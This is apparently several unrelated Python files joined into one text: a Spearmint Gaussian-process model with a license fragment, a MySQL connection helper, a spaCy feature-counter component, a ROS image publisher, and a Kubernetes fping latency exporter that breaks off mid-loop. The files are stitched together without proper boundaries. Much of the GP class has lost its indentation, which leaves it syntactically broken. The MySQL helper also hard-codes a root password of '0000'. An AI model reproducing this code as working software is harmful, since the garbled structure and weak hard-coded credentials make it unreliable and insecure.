# INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, PUNITIVE OR OTHER
# DAMAGES OF ANY KIND WHATSOEVER ARISING OUT OF OR IN CONNECTION WITH
# THE SOFTWARE, EVEN IF HARVARD, TORONTO OR SHERBROOKE OR SOCPRA IS
# NEGLIGENT OR OTHERWISE AT FAULT, AND REGARDLESS OF WHETHER HARVARD,
# TORONTO OR SHERBROOKE OR SOCPRA IS ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGES.
#
# 10. INDEMNIFICATION. To the extent permitted by law, End User shall
# indemnify, defend and hold harmless Harvard, Toronto and Sherbrooke
# and Socpra, their corporate affiliates, current or future directors,
# trustees, officers, faculty, medical and professional staff,
# employees, students and agents and their respective successors,
# heirs and assigns (the "Indemnitees"), against any liability,
# damage, loss or expense (including reasonable attorney's fees and
# expenses of litigation) incurred by or imposed upon the Indemnitees
# or any one of them in connection with any claims, suits, actions,
# demands or judgments arising from End User’s breach of this
# Agreement or its Institution’s use of the Software except to the
# extent caused by the gross negligence or willful misconduct of
# Harvard, Toronto or Sherbrooke or Socpra. This indemnification
# provision shall survive expiration or termination of this Agreement.
#
# 11. GOVERNING LAW. This Agreement shall be construed and governed by
# the laws of the Commonwealth of Massachusetts regardless of
# otherwise applicable choice of law standards.
#
# 12. NON-USE OF NAME. Nothing in this License and Terms of Use shall
# be construed as granting End Users or their Institutions any rights
# or licenses to use any trademarks, service marks or logos associated
# with the Software. You may not use the terms “Harvard” or
# “University of Toronto” or “Université de Sherbrooke” or “Socpra
# Sciences et Génie S.E.C.” (or a substantially similar term) in any
# way that is inconsistent with the permitted uses described
# herein. You agree not to use any name or emblem of Harvard, Toronto
# or Sherbrooke, or any of their subdivisions for any purpose, or to
# falsely suggest any relationship between End User (or its
# Institution) and Harvard, Toronto and/or Sherbrooke, or in any
# manner that would infringe or violate any of their rights.
#
# 13. End User represents and warrants that it has the legal authority
# to enter into this License and Terms of Use on behalf of itself and
# its Institution.
import logging
import numpy as np
import numpy.random as npr
import scipy.linalg as spla
import scipy.stats as sps
from .abstract_model import AbstractModel
from ..utils.param import Param as Hyperparameter
import spearmint.kernels
from ..kernels import *
from ..sampling.slice_sampler import SliceSampler
from ..utils import priors
from .. import transformations
from ..transformations import Transformer
# try:
# module = sys.modules['__main__'].__file__
# log = logging.getLogger(module)
# except:
# log = logging.getLogger()
# print 'Not running from main.'
# Default model options; any entry may be overridden via the **options
# keyword arguments passed to GP.__init__.
OPTION_DEFAULTS = {
    'verbose' : False,
    'mcmc_diagnostics' : False,
    'mcmc_iters' : 10,   # MCMC samples of the hyperparameters per fit
    'burnin' : 20,       # burn-in sweeps before collecting samples
    'thinning' : 0,
    'num_fantasies' : 1, # fantasy outcomes drawn per pending job
    'caching' : True,    # cache Cholesky factors per hyperparameter state
    'max_cache_mb' : 256,
    'likelihood' : 'gaussian',  # 'noiseless' disables the noise kernel
    'kernel' : 'Matern52',      # class name looked up in spearmint.kernels
    'stability_jitter' : 1e-6,  # diagonal jitter for numerical stability
    'fit_mean' : True,
    'fit_amp2' : True,
    'transformations' : [],
    'priors' : [],
    'initial_ls' : 0.1,
    'initial_mean' : 0.0, # initial values of the hypers
    'initial_amp2' : 1.0,
    'initial_noise' : 0.0001,
    'conditioning' : None,
    'batch_size' : 1
}
class GP(AbstractModel):
def __init__(self, num_dims, **options):
opts = OPTION_DEFAULTS.copy()
opts.update(options)
if hasattr(self, 'options'):
opts.update(self.options)
# This is a bit of a mess. Basically to make it work with the GPClassifer --
# but yes I know the GP shouldn't have code for the sake of those who inherit from it
# TODO -- clean this up
self.options = opts
self.num_dims = num_dims
self.batch_size = self.options['batch_size']
self.noiseless = self.options['likelihood'].lower() == "noiseless"
self._inputs = None # Matrix of data inputs
self._values = None # Vector of data values
self.pending = None # Matrix of pending inputs
# TODO: support meta-data
self.params = None
self._cache_list = [] # Cached computations for re-use.
self._hypers_list = [] # Hyperparameter dicts for each state.
self._fantasy_values_list = [] # Fantasy values generated from pending samples.
self.state = None
self._random_state = npr.get_state()
self._samplers = []
# If you are only doing one fantasy of pending jobs, then don't even both sampling
# it from the marginal gaussian posterior predictive and instead just take
# the mean of this distribution. This only has an effect if num_fantasies is 1
self._use_mean_if_single_fantasy = True
# get the Kernel type from the options
try:
self.input_kernel_class = getattr(spearmint.kernels, self.options['kernel'])
except NameError:
raise Exception("Unknown kernel: %s" % self.options['kernel'])
self._kernel = None
self._kernel_with_noise = None
self.num_states = 0
self.chain_length = 0
self.max_cache_bytes = self.options['max_cache_mb']*1024*1024
self._build()
def _set_params_from_dict(self, hypers_dict):
# for name, hyper in self.params.iteritems():
# doing it the above way is worse-- because if you changed the config
# to add hyperparameters, they won't be found in the hypers_dict.
# this way is more robust
for name, hyper in hypers_dict.iteritems():
if name in self.params:
self.params[name].value = hypers_dict[name]
def _prepare_cache(self):
self._cache_list = list()
inputs_hash = hash(self.inputs.tostring())
for i in xrange(self.num_states):
self.set_state(i)
chol = spla.cholesky(self.kernel.cov(self.inputs), lower=True)
alpha = spla.cho_solve((chol, True), self.values - self.mean.value)
cache_dict = {
'chol' : chol,
'alpha' : alpha
}
self._cache_list.append(cache_dict)
def jitter_value(self):
return self.stability_noise_kernel.noise.value
def noise_value(self):
if self.noiseless:
return self.stability_noise_kernel.noise.value
else:
return self.params['noise'].value
    def _build(self):
        """Construct the transformation stack, the kernel (with optional
        observation noise), the constant mean hyperparameter, and the slice
        samplers used for MCMC over all hyperparameters.

        Populates: self.params, self.scaled_input_kernel,
        self.stability_noise_kernel, self._kernel, self._kernel_with_noise,
        self.mean, self._samplers.
        """
        self.params = dict()
        # these should be in the right order because the json was parsed with an orderedDict
        # could make this more robust by using a list instead...
        transformer = Transformer(self.num_dims)
        for trans in self.options['transformations']:
            assert len(trans) == 1 # this is the convention-- a list of length-1 dicts
            trans_class = trans.keys()[0]
            trans_options = trans.values()[0]
            T = getattr(transformations,trans_class)(self.num_dims, **trans_options)
            transformer.add_layer(T)
            self.params.update({param.name:param for param in T.hypers})
        # Default is BetaWarp (set in main.py)
        # else: # default uses BetaWarp
        #     beta_warp = BetaWarp(self.num_dims)
        #     transformer.add_layer(beta_warp)
        #     self.params.update({param.name:param} for param in beta_warp.hypers)
        # Build the component kernels
        # length_scale_prior = priors.Scale(priors.Beta(1.5, 5.0), 10.0)
        length_scale_prior = priors.Scale(priors.Beta(1.5, 7.0), 5.0) # smaller
        # length_scale_prior = priors.Scale(priors.Beta(0.5, 7.0), 5.0) # even smaller
        # length_scale_prior = None
        # set initial/default length scale value to be an array. we can't do this in advance
        # because we don't know the size of the GP yet.
        if self.options['initial_ls'] is not None and isinstance(self.options['initial_ls'], float):
            initial_ls_value = np.ones(self.num_dims) * self.options['initial_ls']
        else:
            initial_ls_value = self.options['initial_ls']
        input_kernel = self.input_kernel_class(self.num_dims, prior=length_scale_prior, value=initial_ls_value, conditioning=self.options["conditioning"])
        self.scaled_input_kernel = Scale(input_kernel, value=self.options['initial_amp2'])
        self.stability_noise_kernel = Noise(self.num_dims, name='stability_jitter', value=self.options['stability_jitter']) # Even if noiseless we use some noise for stability
        sum_kernel = SumKernel(self.scaled_input_kernel, self.stability_noise_kernel)
        # The final kernel applies the transformation.
        self._kernel = TransformKernel(sum_kernel, transformer)
        # Finally make a noisy version if necessary
        if not self.noiseless:
            noise_kernel = Noise(self.num_dims, value=self.options['initial_noise'])
            self._kernel_with_noise = SumKernel(self._kernel, noise_kernel)
        # Build the mean function (just a constant mean for now)
        self.mean = Hyperparameter(
            initial_value = self.options['initial_mean'],
            prior = priors.Gaussian(0.0,1.0),
            name = 'mean'
        )
        self.params['ls'] = input_kernel.hypers
        # Slice sample all params with compwise=True, except for mean,amp2,(noise) handled below
        self._samplers.append(SliceSampler(*self.params.values(), compwise=True, thinning=self.options['thinning']))
        amp2 = self.scaled_input_kernel.hypers
        self.params['amp2'] = amp2 # stick it in params because PESC examines this
        # i guess it doesn't really matter if it is in params, what matters it toSample
        toSample = list()
        if self.options['fit_amp2']:
            toSample.append(amp2)
        if self.options['fit_mean']:
            self.params['mean'] = self.mean
            toSample.append(self.mean)
        if not self.noiseless:
            self.params['noise'] = noise_kernel.noise
            toSample.append(noise_kernel.noise)
        if len(toSample) > 0:
            self._samplers.append(SliceSampler(*toSample, compwise=False, thinning=self.options['thinning']))
def _burn_samples(self, num_samples):
if num_samples == 0:
return
# logging.debug('GPClassifer: burning %s: ' % ', '.join(self.params.keys()))
# logging.debug('%05d/%05d' % (0, num_samples))
logging.debug(' Burning %d samples...' % num_samples)
for i in xrange(num_samples):
# if self.options['verbose']:
# logging.debug('\b'*11+'%05d/%05d' % (i, num_samples))
for sampler in self._samplers:
sampler.sample(self)
self.chain_length += 1
# if self.options['verbose']:
# logging.debug('\n')
def _collect_samples(self, num_samples):
hypers_list = []
for sampler in self._samplers:
logging.debug(' Sampling %d samples of %s with %s' % (num_samples, ', '.join(['%s(%d)'%(param.name, param.size()) for param in sampler.params]), sampler.__class__.__name__))
logging.debug('')
for i in xrange(num_samples):
for sampler in self._samplers:
sampler.sample(self)
hypers_list.append(self.to_dict()['hypers'])
self.chain_length += 1
self._hypers_list = hypers_list
def _collect_fantasies(self, pending):
fantasy_values_list = []
for i in xrange(self.num_states):
self.set_state(i)
fantasy_vals = self._fantasize(pending)
if fantasy_vals.ndim == 1:
fantasy_vals = fantasy_vals[:,np.newaxis]
fantasy_values_list.append(fantasy_vals)
return fantasy_values_list
def _fantasize(self, pend):
if self._use_mean_if_single_fantasy and self.options['num_fantasies'] == 1:
predicted_mean, cov = self.predict(pend)
return predicted_mean
else:
npr.set_state(self._random_state)
return self.sample_from_posterior_given_hypers_and_data(pend, self.options['num_fantasies'])
@property
def inputs(self):
if self.pending is None or len(self._fantasy_values_list) < self.num_states:
return self._inputs
else:
return np.vstack((self._inputs, self.pending)) # Could perhaps cache this to make it faster.
    @property
    def observed_inputs(self):
        # Inputs actually observed (never includes pending/fantasy rows).
        return self._inputs
    @property
    def values(self):
        # Until fantasies exist for every state, expose only real observations.
        if self.pending is None or len(self._fantasy_values_list) < self.num_states:
            return self._values
        if self.options['num_fantasies'] == 1:
            # Single fantasy per pending job: append it to the observed values.
            return np.append(self._values, self._fantasy_values_list[self.state].flatten(), axis=0)
        else:
            # Multiple fantasies: tile the observed values across fantasy
            # columns, then stack the per-state fantasy matrix below them.
            return np.append(np.tile(self._values[:,None], (1,self.options['num_fantasies'])), self._fantasy_values_list[self.state], axis=0)
    @property
    def observed_values(self):
        # Values actually observed (never includes fantasy values).
        return self._values
@property
def kernel(self):
if self.noiseless:
return self._kernel
else:
return self._kernel_with_noise if self._kernel_with_noise is not None else self._kernel
    @property
    def noiseless_kernel(self):
        # Kernel without the observation-noise component (jitter only).
        return self._kernel
@property
def has_data(self):
return self.observed_inputs is not None and self.observed_inputs.size > 0
def caching(self):
if not self.options['caching'] or self.num_states <= 0:
return False
# For now this only computes the cost of storing the Cholesky decompositions.
cache_mem_usage = (self._inputs.shape[0]**2) * self.num_states * 8. # Each double is 8 bytes.
if cache_mem_usage > self.max_cache_bytes:
logging.debug('Max memory limit of %d bytes reached. Not caching intermediate computations.' % self.max_cache_bytes)
return False
return True
    def set_state(self, state):
        # Make `state` (an index into the sampled hyperparameter list) the
        # current model state by restoring its hyperparameter values.
        self.state = state
        self._set_params_from_dict(self._hypers_list[state])
def to_dict(self):
gp_dict = {'hypers' : {}}
for name, hyper in self.params.iteritems():
gp_dict['hypers'][name] = hyper.value
# I don't understand why this is stored...? as soon as you call fit
# it gets set to 0 anyway.
gp_dict['chain length'] = self.chain_length
return gp_dict
    def from_dict(self, gp_dict):
        # Restore hyperparameter values and chain position from to_dict() output.
        self._set_params_from_dict(gp_dict['hypers'])
        self.chain_length = gp_dict['chain length']
    def reset_params(self):
        # Restore every hyperparameter to its configured default value.
        for param in self.params.values():
            param.reset_value() # set to default
    # if fit_hypers is False, then we do not perform MCMC and use whatever we have
    # in other words, we are just changing setting the data if fit_hypers is False
    def fit(self, inputs, values, pending=None, hypers=None, reburn=False, fit_hypers=True):
        """Set the model's data and (optionally) re-sample hyperparameters.

        inputs/values: observed data. pending: inputs of jobs still running,
        for which fantasy outcomes are generated. hypers: optional dict (as
        returned by to_dict()) used to initialize the hyperparameters.
        Returns to_dict() of the final state.
        """
        # Set the data for the GP
        self._inputs = inputs
        self._values = values
        if self.options['mcmc_iters'] == 0: # do not do MCMC
            fit_hypers = False
        self._fantasy_values_list = [] # fantasy of pendings
        # Initialize the GP with hypers if provided, or else set them to their default
        if hypers:
            self.from_dict(hypers)
        else:
            self.reset_params()
        if fit_hypers:
            # self._hypers_list = [] # samples hypers
            # self._cache_list = [] # caching cholesky
            self.chain_length = 0 # chain of hypers
            # Burn samples (if needed)
            # NOTE(review): chain_length was just reset to 0 above, so the
            # condition below always triggers a full burn-in -- confirm the
            # reset is intended to precede this check.
            num_samples_to_burn = self.options['burnin'] if reburn or self.chain_length < self.options['burnin'] else 0
            self._burn_samples(num_samples_to_burn)
            # Now collect some samples (sets self._hypers_list)
            self._collect_samples(self.options['mcmc_iters'])
            # Now we have more states
            self.num_states = self.options['mcmc_iters']
        else:
            if len(self._hypers_list) == 0:
                # Just use the current hypers as the only state
                self._hypers_list = [self.to_dict()['hypers']]
                self.num_states = 1
        self._cache_list = [] # i think you need to do this before collecting fantasies...
        # Set pending data and generate corresponding fantasies
        if pending is not None:
            self.pending = pending
            self._fantasy_values_list = self._collect_fantasies(pending)
        # Actually compute the cholesky and all that stuff -- this is the "fitting"
        # If there is new data (e.g. pending stuff) but fit_hypers is False
        # we still want to do this... because e.g. new pending stuff does change the cholesky.
        if self.caching() and self.has_data:
            self._prepare_cache()
        # Set the hypers to the final state of the chain
        self.set_state(len(self._hypers_list)-1)
        return self.to_dict()
def log_likelihood(self):
"""
GP Marginal likelihood
"""
if not self.has_data:
return 0.0
# cannot do caching of chol here because we are evaluating different length scales
# -- nothing to cache yet
cov = self.kernel.cov(self.observed_inputs)
chol = spla.cholesky(cov, lower=True)
solve = spla.cho_solve((chol, True), self.observed_values - self.mean.value)
complexity_penalty = -np.sum(np.log(np.diag(chol)))
data_fit_term = -0.5*np.dot(self.observed_values - self.mean.value, solve)
return complexity_penalty + data_fit_term
# Uses the identity that log det A = log prod diag chol A = sum log diag chol A
# return -np.sum(np.log(np.diag(chol)))-0.5*np.dot(self.observed_values - self.mean.value, solve)
    # cholK is only used for the Predictive Entropy Search acquisition function
    # Please ignore it otherwise...
    def predict(self, pred, full_cov=False, compute_grad=False):
        """Posterior predictive mean and (co)variance at the points `pred`.

        Returns (mean, var) by default; (mean, cov) if full_cov; and
        additionally the gradients of mean and variance w.r.t. the inputs
        if compute_grad. Falls back to the prior when no data is present.
        """
        inputs = self.inputs
        values = self.values
        if pred.shape[1] != self.num_dims:
            raise Exception("Dimensionality of test points is %d but dimensionality given at init time is %d." % (pred.shape[1], self.num_dims))
        # Special case if there is no data yet --> predict from the prior
        if not self.has_data:
            return self.predict_from_prior(pred, full_cov, compute_grad)
        # The primary covariances for prediction.
        cand_cross = self.noiseless_kernel.cross_cov(inputs, pred)
        # Reuse the cached Cholesky/alpha for the current state if available.
        if self.caching() and len(self._cache_list) == self.num_states:
            chol = self._cache_list[self.state]['chol']
            alpha = self._cache_list[self.state]['alpha']
        else:
            chol = spla.cholesky(self.kernel.cov(self.inputs), lower=True)
            alpha = spla.cho_solve((chol, True), self.values - self.mean.value)
        # Solve the linear systems.
        # Note: if X = LL^T, cho_solve performs X\b whereas solve_triangular performs L\b
        beta = spla.solve_triangular(chol, cand_cross, lower=True)
        # Predict the marginal means at candidates.
        func_m = np.dot(cand_cross.T, alpha) + self.mean.value
        if full_cov:
            # Return the covariance matrix of the pred inputs,
            # rather than just the individual variances at each input
            cand_cov = self.noiseless_kernel.cov(pred)
            func_v = cand_cov - np.dot(beta.T, beta)
        else:
            cand_cov = self.noiseless_kernel.diag_cov(pred) # it is slow to generate this diagonal matrix... for stationary kernels you don't need to do this
            func_v = cand_cov - np.sum(beta**2, axis=0)
        if not compute_grad:
            return func_m, func_v
        grad_cross = self.noiseless_kernel.cross_cov_grad_data(inputs, pred)
        grad_xp_m = np.tensordot(np.transpose(grad_cross, (1,2,0)), alpha, 1)
        # this should be faster than (and equivalent to) spla.cho_solve((chol, True),cand_cross))
        gamma = spla.solve_triangular(chol.T, beta, lower=False)
        # Using sum and multiplication and summing instead of matrix multiplication
        # because I only want the diagonals of the gradient of the covariance matrix, not the whole thing
        grad_xp_v = -2.0*np.sum(gamma[:,:,np.newaxis] * grad_cross, axis=0)
        # Not very important -- just to make sure grad_xp_v.shape = grad_xp_m.shape
        if values.ndim > 1:
            grad_xp_v = grad_xp_v[:,:,np.newaxis]
        # In case this is a function over a 1D input,
        # return a numpy array rather than a float
        if np.ndim(grad_xp_m) == 0:
            grad_xp_m = np.array([grad_xp_m])
            grad_xp_v = np.array([grad_xp_v])
        return func_m, func_v, grad_xp_m, grad_xp_v
def predict_from_prior(self, pred, full_cov=False, compute_grad=False):
mean = self.mean.value * np.ones(pred.shape[0])
if full_cov:
cov = self.noiseless_kernel.cov(pred)
return mean, cov
elif compute_grad:
var = self.noiseless_kernel.diag_cov(pred)
grad = np.zeros((pred.shape[0], self.num_dims))
return mean, var, grad, grad
else:
var = self.noiseless_kernel.diag_cov(pred)
return mean, var
# -------------------------------------------------------- #
# #
# Below are four sampling routines. Each one has the same #
# signature. "pred" contains the inputs at which we would #
# like to sample. "n_samples" is the number of samples. If #
# n_samples is 1 we return a squeezed vector. "joint" is a #
# boolean indicating whether we want to sample jointly. #
# joint=True means sample normally. joint=False means #
# sample from the conditional distribution at each input, #
# and just compute them all together in a vectorized way. #
# #
# -------------------------------------------------------- #
# Sample from p(y | theta), where theta is given by the current state
def sample_from_prior_given_hypers(self, pred, n_samples=1, joint=True):
N_pred = pred.shape[0]
if joint:
mean = self.mean.value
cov = self.noiseless_kernel.cov(pred) # Gaussian likelihood happens here
return npr.multivariate_normal(mean*np.ones(N_pred), cov, size=n_samples).T.squeeze()
else:
mean = self.mean.value
var = self.noiseless_kernel.diag_cov(pred)
return np.squeeze(mean + npr.randn(N_pred, n_samples) * np.sqrt(var)[:,None])
# Sample from p(y)
# This is achieved by first sampling theta from its hyperprior p(theta), and then
# sampling y from p(y | theta)
def sample_from_prior(self, pred, n_samples=1, joint=True):
fants = np.zeros((pred.shape[0], n_samples))
for i in xrange(n_samples):
for param in self.params:
self.params[ param ].sample_from_prior() # sample from hyperpriors and set value
fants[:,i] = self.sample_from_prior_given_hypers(pred, joint)
return fants.squeeze() # squeeze in case n_samples=1
# Terminology: does "posterior" usually refer to p(theta | data) ?
# By "posterior" I guess I mean "posterior predictive", p(y | data)
# Sample from p(y | theta, data), where theta is given by the current state
def sample_from_posterior_given_hypers_and_data(self, pred, n_samples=1, joint=True):
if joint:
predicted_mean, cov = self.predict(pred, full_cov=True) # This part depends on the data
return npr.multivariate_normal(predicted_mean, cov, size=n_samples).T.squeeze()
else:
predicted_mean, var = self.predict(pred, full_cov=False) # This part depends on the data
return np.squeeze(predicted_mean[:,None] + npr.randn(pred.shape[0], n_samples) * np.sqrt(var)[:,None])
# Sample from p(y | data), integrating out the hyperparameters (theta)
# This is achieved by first sampling theta from p(theta | data), and then
# sampling y from p(y | theta, data)
def sample_from_posterior_given_data(self, pred, n_samples=1, joint=True):
fants = np.zeros((pred.shape[0], n_samples))
for i in xrange(n_samples):
# Sample theta from p(theta | data)
self.generate_sample(1)
# Sample y from p(y | theta, data)
fants[:,i] = self.sample_from_posterior_given_hypers_and_data(pred, joint)
return fants.squeeze() # squeeze in case n_samples=1
# -------------------------------------------------------- #
# #
# End of sampling functions #
# #
# -------------------------------------------------------- #
    # pi = probability that the latent function value is greater than or equal to C
    # This is evaluated separately at each location in pred
    def pi(self, pred, compute_grad=False, C=0):
        """Probability that the latent function is >= C at each point of
        `pred`, under the Gaussian posterior predictive.

        With compute_grad=True, also returns the total derivative of that
        probability w.r.t. the input locations.
        """
        if not compute_grad:
            mean, sigma2 = self.predict(pred, compute_grad=False)
        else:
            mean, sigma2, g_m_x, g_v_x = self.predict(pred, compute_grad=True)
        sigma = np.sqrt(sigma2)
        C_minus_m = C-mean
        # norm.sf = 1 - norm.cdf
        prob = sps.norm.sf(C_minus_m/sigma)
        if not compute_grad:
            return prob
        else:
            # Gradient of pi w.r.t. GP mean
            g_p_m = sps.norm.pdf( C_minus_m / sigma ) / sigma
            # Gradient of pi w.r.t. GP variance (equals grad w.r.t. sigma / (2*sigma))
            g_p_v = sps.norm.pdf( C_minus_m / sigma ) * C_minus_m / sigma2 / (2*sigma)
            # Total derivative of pi w.r.t. inputs (chain rule through mean and variance)
            grad_p = g_p_m[:,np.newaxis] * g_m_x + g_p_v[:,np.newaxis] * g_v_x
            return prob, grad_p
|
import mysql.connector
def conn(host="127.0.0.1", user="root", password="0000", database="future"):
    """Open and return a new connection to the MySQL `future` database.

    The previously hard-coded connection settings are now overridable
    parameters; the defaults preserve the original behavior, so existing
    `conn()` callers are unaffected. The caller owns (and must close) the
    returned connection.
    """
    # NOTE(review): default credentials are hard-coded; prefer sourcing them
    # from environment variables or a config file in production.
    return mysql.connector.connect(
        host=host,
        user=user,
        password=password,
        database=database,
    )
from itertools import tee
from spacy.tokens import Doc
from spacy.tokens import Token
from spacy.language import Language
from text_complexity_analyzer_cm.constants import ACCEPTED_LANGUAGES
# Per-Doc extension slot that will hold the computed feature count.
Doc.set_extension('feature_count', default=None, force=True)

# NOTE(review): the factory name contains a space; spaCy factory names are
# conventionally snake_case (e.g. 'feature_counter') -- confirm this string
# registers and is addressable via nlp.add_pipe.
@Language.factory('feature counter')
class FeatureCounter:
    """spaCy pipeline component that applies a pluggable counting function to
    each Doc and stores the result in ``doc._.feature_count``.

    ``counter_function`` must be assigned by the caller before the component
    processes any document.
    """
    def __init__(self, nlp, name, language) -> None:
        # Reject languages the analyzer does not support.
        if not language in ACCEPTED_LANGUAGES:
            raise ValueError(f'Language {language} is not supported yet')
        self.language = language
        # Assigned externally, per analysis, to the metric to compute.
        self.counter_function = None
    def __call__(self, doc: Doc) -> Doc:
        '''
        Apply the configured ``counter_function`` to the document and store
        the result in ``doc._.feature_count``.

        Parameters:
        doc(Doc): A Spacy document.

        Returns:
        Doc: the same document, with the extension attribute filled in.
        '''
        if self.counter_function is None:
            raise AttributeError('No function to count features was provided.')
        doc._.feature_count = self.counter_function(doc)
        return doc
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
import glob
class image_converter:
    """Publishes a folder of JPEG images on /thermal_yolo/image at 10 Hz,
    emulating a thermal camera for downstream consumers."""
    def __init__(self):
        rospy.init_node('image_converter', anonymous=True)
        self.image_pub = rospy.Publisher("/thermal_yolo/image",Image,queue_size=1)
        self.bridge = CvBridge()
        #self.camera = cv2.VideoCapture(0)
        #self.image_list = glob.glob("/home/sam/Downloads/FLIR_ADAS_1_3/train/Annotated_thermal_8_bit/*.jpeg")
        # NOTE(review): hard-coded, user-specific image directory -- consider
        # exposing it as a ROS parameter instead.
        self.image_list = glob.glob("/home/sam/images/*.jpeg")
        self.rate = rospy.Rate(10)  # publishing rate in Hz
    def mainloop(self):
        """Publish each image once, paced by self.rate; stops on Ctrl-C."""
        try:
            for image_file in self.image_list:
                image = cv2.imread(image_file)
                #print(image)
                try:
                    self.image_pub.publish(self.bridge.cv2_to_imgmsg(image, "bgr8"))
                    self.rate.sleep()
                except CvBridgeError as e:
                    print(e)
        except KeyboardInterrupt:
            print("Shutting down")
        cv2.destroyAllWindows()
# Run the publisher only when executed as a script; previously the node was
# instantiated (and the publish loop run) as a side effect of importing this
# module, which breaks any `import` of this file.
if __name__ == '__main__':
    x = image_converter()
    x.mainloop()
|
#!/usr/bin/env python3
# Copyright 2021 Flant JSC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import prometheus_client
import re
import statistics
import os, sys
import json
import glob
# fping flags: -p 1000 ms period, -C 30 samples per target, -B 1 (no backoff),
# -q quiet per-probe output (summary only), -r 1 retry.
FPING_CMDLINE = "/usr/sbin/fping -p 1000 -C 30 -B 1 -q -r 1".split(" ")
# Matches one fping summary line per host: "<host> : <30 space-separated RTTs or '-'>".
FPING_REGEX = re.compile(r"^(\S*)\s*: (.*)$", re.MULTILINE)
# Mounted configuration listing cluster node and external ping targets.
CONFIG_PATH = "/config/targets.json"

# Dedicated registry so only this exporter's metrics land in the textfile.
registry = prometheus_client.CollectorRegistry()

prometheus_exceptions_counter = \
    prometheus_client.Counter('kube_node_ping_exceptions', 'Total number of exceptions', [], registry=registry)

# Metrics for pings between cluster nodes, labelled by destination node/IP.
prom_metrics_cluster = {"sent": prometheus_client.Counter('kube_node_ping_packets_sent_total',
                                                          'ICMP packets sent',
                                                          ['destination_node', 'destination_node_ip_address'],
                                                          registry=registry),
                        "received": prometheus_client.Counter('kube_node_ping_packets_received_total',
                                                              'ICMP packets received',
                                                              ['destination_node', 'destination_node_ip_address'],
                                                              registry=registry),
                        "rtt": prometheus_client.Counter('kube_node_ping_rtt_milliseconds_total',
                                                         'round-trip time',
                                                         ['destination_node', 'destination_node_ip_address'],
                                                         registry=registry),
                        "min": prometheus_client.Gauge('kube_node_ping_rtt_min', 'minimum round-trip time',
                                                       ['destination_node', 'destination_node_ip_address'],
                                                       registry=registry),
                        "max": prometheus_client.Gauge('kube_node_ping_rtt_max', 'maximum round-trip time',
                                                       ['destination_node', 'destination_node_ip_address'],
                                                       registry=registry),
                        "mdev": prometheus_client.Gauge('kube_node_ping_rtt_mdev',
                                                        'mean deviation of round-trip times',
                                                        ['destination_node', 'destination_node_ip_address'],
                                                        registry=registry)}

# Same metric set for targets outside the cluster, labelled by name/host.
prom_metrics_external = {"sent": prometheus_client.Counter('external_ping_packets_sent_total',
                                                           'ICMP packets sent',
                                                           ['destination_name', 'destination_host'],
                                                           registry=registry),
                         "received": prometheus_client.Counter('external_ping_packets_received_total',
                                                               'ICMP packets received',
                                                               ['destination_name', 'destination_host'],
                                                               registry=registry),
                         "rtt": prometheus_client.Counter('external_ping_rtt_milliseconds_total',
                                                          'round-trip time',
                                                          ['destination_name', 'destination_host'],
                                                          registry=registry),
                         "min": prometheus_client.Gauge('external_ping_rtt_min', 'minimum round-trip time',
                                                        ['destination_name', 'destination_host'],
                                                        registry=registry),
                         "max": prometheus_client.Gauge('external_ping_rtt_max', 'maximum round-trip time',
                                                        ['destination_name', 'destination_host'],
                                                        registry=registry),
                         "mdev": prometheus_client.Gauge('external_ping_rtt_mdev',
                                                         'mean deviation of round-trip times',
                                                         ['destination_name', 'destination_host'],
                                                         registry=registry)}
def validate_envs():
    """Read the required environment variables, failing fast when one is unset or empty."""
    names = ("MY_NODE_NAME", "PROMETHEUS_TEXTFILE_DIR", "PROMETHEUS_TEXTFILE_PREFIX")
    envs = {name: os.getenv(name) for name in names}
    for name, value in envs.items():
        if not value:
            raise ValueError("{} environment variable is empty".format(name))
    return envs
@prometheus_exceptions_counter.count_exceptions()
def compute_results(results):
    """Parse raw fping output into per-host packet and RTT statistics.

    Returns a dict mapping host -> {sent, received, rtt, min, max, mdev}.
    Raises ValueError when a host line has an unexpected sample count or
    when nothing in the output matches the expected format.
    """
    computed = {}

    for match in FPING_REGEX.finditer(results):
        host = match.group(1)
        ping_results = match.group(2)
        # Duplicate-reply lines would skew the statistics; skip them.
        if "duplicate" in ping_results:
            continue
        splitted = ping_results.split(" ")

        # fping is invoked with -C 30, so exactly 30 samples are expected.
        if len(splitted) != 30:
            raise ValueError("ping returned wrong number of results: \"{}\"".format(splitted))

        # "-" marks a lost probe; keep only the numeric round-trip times.
        rtts = [float(sample) for sample in splitted if sample != "-"]

        if rtts:
            computed[host] = {"sent": 30, "received": len(rtts),
                              "rtt": sum(rtts),
                              "max": max(rtts), "min": min(rtts),
                              "mdev": statistics.pstdev(rtts)}
        else:
            computed[host] = {"sent": 30, "received": len(rtts), "rtt": 0,
                              "max": 0, "min": 0, "mdev": 0}
    if not computed:
        raise ValueError("regex match\"{}\" found nothing in fping output \"{}\"".format(FPING_REGEX, results))
    return computed
@prometheus_exceptions_counter.count_exceptions()
def call_fping(ips):
    """Run fping against *ips* and return its combined stdout/stderr text.

    Raises:
        ValueError: fping exited with code 3 (invalid arguments).
        OSError: fping exited with code 4 (system call failure).
    """
    cmdline = FPING_CMDLINE + ips
    process = subprocess.run(cmdline, stdout=subprocess.PIPE,
                             stderr=subprocess.STDOUT, universal_newlines=True)
    if process.returncode == 3:
        raise ValueError("invalid arguments: {}".format(cmdline))
    if process.returncode == 4:
        # Bug fix: stderr is merged into stdout above, so process.stderr is
        # always None — report the captured combined output instead.
        raise OSError("fping reported syscall error: {}".format(process.stdout))

    return process.stdout
envs = validate_envs()

# Start from a clean textfile directory so stale metrics are never scraped.
files = glob.glob(envs["PROMETHEUS_TEXTFILE_DIR"] + "*")
for f in files:
    os.remove(f)

# Tracks the labelled metric handles created for the current target set.
labeled_prom_metrics = {"cluster_targets": [], "external_targets": []}

while True:
    # Reload the target config every iteration so changes are picked up live.
    with open(CONFIG_PATH, "r") as f:
        config = json.loads(f.read())

    config["external_targets"] = [] if config["external_targets"] is None else config["external_targets"]

